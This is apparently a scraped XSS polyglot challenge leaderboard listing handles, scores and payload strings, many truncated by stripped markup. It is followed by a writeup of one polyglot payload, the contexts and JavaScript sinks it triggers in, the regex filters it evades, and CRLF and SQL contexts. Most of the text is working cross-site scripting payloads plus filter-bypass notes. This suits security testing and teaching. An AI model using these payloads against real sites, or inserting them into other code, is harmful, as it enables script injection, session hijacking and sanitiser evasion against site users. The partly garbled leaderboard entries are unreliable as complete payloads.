0 crlf 20 141 javascript:"/*'/*`/*--> 1 europa 20 143 javascript:"/*'/*`/*\" /*<svg/onload=/* 2 EdOverflow 20 143 javascript:"/*\"/*`/*' /*--><svg onload=/* 3 h1/ragnar 20 143 javascript:`//"//\"//<svg/onload='/*-->` 4 A. Korzhynskyi 20 143 javascript:`//"//\"//<svg/onload='/*-->` 5 Somdev Sangwan 20 144 javascript:`/*\"/*--><svg onload='/*` 6 @trichimtrich 20 144 javascript:"/*'//`//\"// 7 tsug0d 20 145 javascript:"/*`/*\"/*'/* 8 Benoit Esnard 20 146 javascript:`\"///"//<` 9 @rawsec 20 146 javascript:`\"///"//<` 10 @RakeshMane10 20 149 javascript:/*`//'//\"//--> 11 @TeamBounters 20 149 javascript:/*`//'//\"//--> 12 bounter 20 150 javascript:/*"//'//`//\"//--> 13 bayo 20 150 javascript:/*-->'//"//`//\"// 14 n1 20 150 javascript:/*"/*'/*`/*\"/*--> 15 @y0n3uchy 20 150 javascript:/*"/*'/*\"/*`/*--> 16 Meerkat 20 152 javascript:/*"/*`/*'/*\"/*--> 17 qd (@qd0an) 20 154 javascript:"/*'//`//\"//-->< 18 i 20 155 javascript:alert()"//\"//'//`//--> 19 yusuke 20 155 javascript:alert()"//\"//'//`//--> 20 @m4th3c 20 156 javascript:/*"/*`/*'/*\"/*< 21 concavang 20 156 javascript:"/*`/*\"/*' /*<img src=x:x onerror=alert(1)> alert(1)// 53 k9 19 143 javascript:"/*'//`//\"// 54 xrekkusu 19 165 javascript:/*\"+/*<script>//--> 55 h45h5h0t 19 179 javascript:alert();//<svg/onload= alert()>/*"/*'/*`/*\"/**/ alert()();// 56 @h45h5h0t 19 179 javascript:alert();//<svg/onload= alert()>/*"/*'/*`/*\"/**/ alert()();// 57 titi 19 211 javascript:alert()//'/*`/*"/**/;alert()//%0D%0A-->'>"><svg/oNloAd=alert()>*/alert();//"alert();// 74 sysr00t 15 131 javASCripT:/*\\"/*\"/*'/*`/**/(/**/onClICk=alert``)//< 75 awsm 15 156 /*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert())// 76 t 15 156 /*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert())// 77 seth 15 189 javascript:alert(1);//";alert(1);//';alert(1);//`;alert(1);//">'>-->%26lt; alert(1);// 78 aaaaaab 15 192 javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert())//--> 79 abdilahrf 15 224 javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//'"/*–>]]>%>?>!-->>’ 80 aaaaaa 14 170 javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert())//--> 81 testing B 14 281 javascript:alert()//<img src=1 onerror=alert()>"onmouseover=alert() 'onmouseover=alert() -->'-alert()-';"-alert()-";${alert()} 82 x3b 13 141 */alert()/*'-->"--> 85 byq 12 123 ";alert()//-->"'> 86 o_O 12 143 jaVasCript:/*-/*`/*`/*'/*'"/**/(/**/oNCliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e 87 Cider sweet 12 155 jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e 88 lala 12 358 jaVaSCriPt:/*\\x3csvG/oNloAd=alert()\\x3e*/alert()//;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoKT4K}}-->';alert();'";alert();"--> 89 loop 11 116 */";alert();//';alert();//‘;alert();>-->'> 91 ww 11 125 '>">'--> 92 Madsi lingling 11 128 '"> --> 93 L 11 128 -->"//'//> 94 dorans_blade 11 132 "'>-->\x3csVg/\x3e 96 moe 11 135 "'--> 97 0 11 138 "'>--> 98 jesusohjesus 11 138 ">-->'>-->-->-->-->-->-->-->-->--> 99 Checkium 11 143 jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert())//%0D%0A%0d%0a//\x3csVg/\x3e 100 123 11 144 jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e 101 borski 11 144 jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e 102 mvs 11 144 jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e 103 aa 11 144 jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e 104 aaron 11 144 jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e 105 pl0kta 11 144 jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e 106 dehong 11 144 jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e 107 asas 11 144 jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e 108 denis 11 144 jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e 109 Jozo 11 144 jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//\x3csVg/\x3e 110 gjbae 11 148 jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert('') )//%0D%0A%0d%0a//\x3csVg/\x3e 111 polyglot 11 152 jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3epolyglot 112 ja1 11 157 */" onload=;alert();//';alert();//‘;alert();>-->\x3csVg/\x3e 114 K 10 88 "'--> 115 Zajebisty ctf 10 102 "'--> 116 nobody2 10 114 117 5unKn0wn 10 117 118 p0uts@ 10 143 javascript:/*--> 119 kumagoro 9 95 '"--> 120 foo 9 97 "'>-->*/ 121 dumb 9 112 javascript:/*--> 122 Dpster 9 113 javascript:/*--> 123 001test 9 547 ">javascript:/*-->">[img=1]">#">""--!> 124 x 8 77 "'--> 125 ssssss 8 132 javascript:"/*'/*`/*--> 126 hello 8 138 '--> javascript:/*--> 127 8 157 javascript:/*"/*`/*'/*\"/*xxxxxxxxxxxxxxxx 128 a 7 62 ">'>--> 129 nyaan 7 99 */alert();';alert();//">'> 130 karlito 7 145 jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e 131 lol 7 145 jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e 132 testgbgb 6 52 "'>-->*/ 133 xss 6 114 javascript:/*--> 134 kurumi 6 118 "> '--> 137 yeeeee 5 339 > ='> "> %3Cscript%3Ealert('XSS')%3C/script%3E 138 @marataziat 4 39 `"*/>'--> 139 BlackGoat 4 47 */`"'--> }''{ 141 tts 3 30 "'--> 143 marataziat 3 38 '`"*/ /> 144 ali 3 60 145 sdf 2 24 '--> 146 SamiaM 2 24 '--> 147 loveOverflow 2 24 '"> 148 thien 2 24 '--> 149 jji 2 24 '--> 150 21 2 24 '--> 151 Mit 2 24 '--> 152 @SecurityMB 2 25 javascript://\" alert()// 153 1 2 26 > 154 zorx 2 27 '-->--> 155 newbuy 2 27 '--> 156 sumfree 2 28 --> 157 Xm17 2 36 158 Damian89 2 36 159 Tagir Z. 2 37 '--> 160 zajebisty ctf 2 47 161 '"/>>> 162 001test555 2 143 ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromChar HTML contexts covered: Double-quoted tag attributes: \x3csVg/\x3e "> Demo: jsbin.com/dopepi Single-quoted tag attributes: Demo: jsbin.com/diwedo Unquoted tag attributes: Demo: jsbin.com/zizuvad Unquoted tag attributes with HTML-escaped values (may require a click): jaVasCript:/*-/*`/*\`/*'/*"/**/(/* Demo: jsbin.com/gopavuz (note that the click might not be needed with elements that support the onload event handler.) href/xlink:href and src attributes with HTML-escaped values: click me Demo: jsbin.com/kixepi click me Demo: jsbin.com/bezofuw Demo: jsbin.com/feziyi HTML comments: \x3csVg/\x3e --> Demo: jsbin.com/taqizu Arbitrary common HTML tags: jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e Demo: jsbin.com/juzuvu \x3csVg/\x3e Demo: jsbin.com/qonawa Demo: jsbin.com/mecexo
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e
Demo: jsbin.com/wuvumuh Script contexts covered: Double-quoted strings: var str = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e"; Demo: jsbin.com/coteco Single-quoted strings: var str = 'jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e'; Demo: jsbin.com/bupera Template strings/literals (ES6): String.raw`jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e`; Demo: jsbin.com/rewapay Regular expression literals: var re = /jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e/; Demo: jsbin.com/zepiti Single-line and multi-line comments: Demo: jsbin.com/fatorag Demo: jsbin.com/vovogo JS sinks: eval: eval(location.hash.slice(1)); Demo: https://jsbin.com/qejisu#jaVasCript:/*-/*%60/%5C%60/*'/%22/**/(/*%20*/oNcliCk=alert()%20)//%0D%0A%0d%0a//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%5Cx3csVg/%3CsVg/oNloAd=alert()//%3E%5Cx3e setTimeout: setTimeout(location.search.slice(1)); Demo: https://jsbin.com/qawusa?jaVasCript:/*-/*%60/*%5C%60/*'/*%22/**/(/*%20*/oNcliCk=alert()%20)//%0D%0A%0d%0a//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%5Cx3csVg/%3CsVg/oNloAd=alert()//%3E%5Cx3e setInterval: setInterval(location.search.slice(1)); Demo: https://jsbin.com/colese?jaVasCript:/*-/*%60/*%5C%60/*'/*%22/**/(/*%20*/oNcliCk=alert()%20)//%0D%0A%0d%0a//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%5Cx3csVg/%3CsVg/oNloAd=alert()//%3E%5Cx3e Function: new Function(location.search.slice(1))(); Demo: https://jsbin.com/hizemi?jaVasCript:/*-/*%60/*%5C%60/*'/*%22/**/(/*%20*/oNcliCk=alert()%20)//%0D%0A%0d%0a//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%5Cx3csVg/%3CsVg/oNloAd=alert()//%3E%5Cx3e innerHTML/outerHTML and document.write with HTML-escaped strings: var data = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e"; document.documentElement.innerHTML = data; Demo: jsbin.com/nimokaz var data = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e"; document.head.outerHTML = data; Demo: jsbin.com/yowivo var data = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e"; document.write(data); document.close(); Demo: jsbin.com/ruhofi Event handlers with HTML-escaped values: Demo: jsbin.com/puboha Filter evasion: As you might have already noticed, the polyglot has been crafted with filter evasion in mind. For instance: jaVasCript:, oNcliCk=, et al. bypasses: preg_replace('/\b(?:javascript:|on\w+=)/', '', PAYLOAD); /*`/*\` bypasses: preg_replace('/`/', '\`', PAYLOAD); bypasses: preg_replace('/<\/\w+>/', '', PAYLOAD); --!> bypasses: preg_replace('/-->/', '', PAYLOAD); bypasses: preg_replace('/<\w+\s+/', '', PAYLOAD); Bonus attacking contexts covered: CRLF-based XSS: HTTP/1.1 200 OK Date: Sun, 01 Mar 2016 00:00:00 GMT Content-Type: text/html; charset=utf-8 Set-Cookie: x=jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )// //\x3csVg/\x3e Error-based SQL injections (yes, SQLi!): SELECT * FROM Users WHERE Username='jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e' SELECT * FROM Users WHERE Username="jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e"